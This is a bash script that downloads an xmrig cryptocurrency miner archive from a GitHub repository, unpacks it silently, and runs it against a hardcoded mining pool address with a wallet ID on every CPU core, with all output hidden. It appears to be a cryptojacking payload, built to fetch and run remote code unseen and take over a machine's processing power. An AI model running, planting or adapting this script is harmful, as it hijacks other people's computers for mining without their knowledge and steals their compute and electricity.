#!/bin/bash
A=167.71.200.23:443
B=SaLvsArMELqRp68FMtCX683viLZam6mgWcokWXSE4MrN1mTP5qoLukeY8cLXjRb3fXfPzNp7esX3xSYwoC15GoY896hFxyKK9AC
C=hehe
wget https://github.com/Adeemar7/all/raw/main/xmrig.tar.gz && tar -xvf xmrig.tar.gz >/dev/null 2>&1
./xmrig --coin=SAL --url $A --user $B --pass $C --donate-level 1 -a rx/0 -t $(nproc --all) >/dev/null 2>&1
